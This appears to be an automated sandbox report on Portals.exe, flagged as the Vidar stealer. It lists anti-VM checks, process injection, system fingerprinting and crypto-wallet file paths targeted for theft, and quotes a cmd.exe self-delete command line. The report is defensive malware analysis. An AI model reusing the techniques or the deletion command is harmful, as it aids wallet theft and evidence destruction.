        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn,1_2_00408C90
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414950
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,1_2_00409560
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,1_2_00413AF0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040FDD0 GetSystemInfo,wsprintfA,1_2_0040FDD0
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
        Source: Amcache.hve.4.drBinary or memory string: VMware
        Source: chrome.exe, 0000000D.00000003.1872696109.00000262C55F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceOME
        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001334000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C257F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service46
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C562F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTnsVMWare
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorV
        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui#
        Source: chrome.exe, 0000000D.00000002.1904320545.00000262BEA4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition|P
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition)
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor=/
        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
        Source: chrome.exe, 0000000D.00000002.1904320545.00000262BE9C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor\
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
        Source: chrome.exe, 0000000D.00000002.1931356757.0000322C01720000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=4cddbebf-37af-43fb-86f1-9d5a74fff9da
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003DD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_C
        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
        Source: chrome.exe, 0000000D.00000003.1871537344.00000262C562F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872517671.00000262C562F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872727014.00000262C563D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873062556.00000262C563D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872858392.00000262C562F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1871706297.00000262C563D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid PartitionY
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service]/t)
        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: chrome.exe, 0000000D.00000003.1872858392.00000262C55FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Servicea
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: chrome.exe, 0000000D.00000003.1826893437.0000322C002F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1(
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V lkthgpceedyudya Bus
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys_.z(>
        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: chrome.exe, 0000000D.00000003.1872517671.00000262C562F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872858392.00000262C562F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorP
        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C5593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V lkthgpceedyudya Bus PipesREGISTR
        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: chrome.exe, 0000000D.00000002.1933889997.00007FFC8F631000.00000020.00000001.01000000.0000000D.sdmpBinary or memory string: xVMcI
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C257F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
        Source: chrome.exe, 0000000D.00000002.1909606808.00000262C55AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C2558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V HypervisorVT
        Source: chrome.exe, 0000000D.00000002.1907392432.00000262C260C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionyP0
        Source: C:\Users\user\Desktop\Portals.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Portals.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Portals.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Portals.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004108E0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 0_2_02652149 mov edi, dword ptr fs:[00000030h]0_2_02652149
        Source: C:\Users\user\Desktop\Portals.exeCode function: 0_2_026522C6 mov edi, dword ptr fs:[00000030h]0_2_026522C6
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040F450 GetProcessHeap,RtlFreeHeap,1_2_0040F450
        Source: C:\Users\user\Desktop\Portals.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Contains functionality to inject code into remote processes
        Source: C:\Users\user\Desktop\Portals.exeCode function: 0_2_02652149 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02652149
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\Portals.exeMemory written: C:\Users\user\Desktop\Portals.exe base: 400000 value starts with: 4D5AJump to behavior
        Searches for specific processes (likely to inject)
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,1_2_00411250
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00411310 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,1_2_00411310
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Users\user\Desktop\Portals.exe "C:\Users\user\Desktop\Portals.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & del /f /q "C:\Users\user\Desktop\Portals.exe" & rd /s /q "C:\ProgramData\i58ym" & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 11Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,1_2_0040FC20
        Source: C:\Users\user\Desktop\Portals.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
        Source: C:\Users\user\Desktop\Portals.exeQueries volume information: C:\Users\user\Desktop\Portals.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0041BAA0 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0041BAA0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00417210 EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,1_2_00417210
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FBC0
        Source: C:\Users\user\Desktop\Portals.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Yara detected Vidar stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: Portals.exe PID: 8012, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*.*
        Source: Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*.*
        Source: Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
        Source: Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \MultiDoge\
        Source: Portals.exe, 00000001.00000002.2197855678.00000000012D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
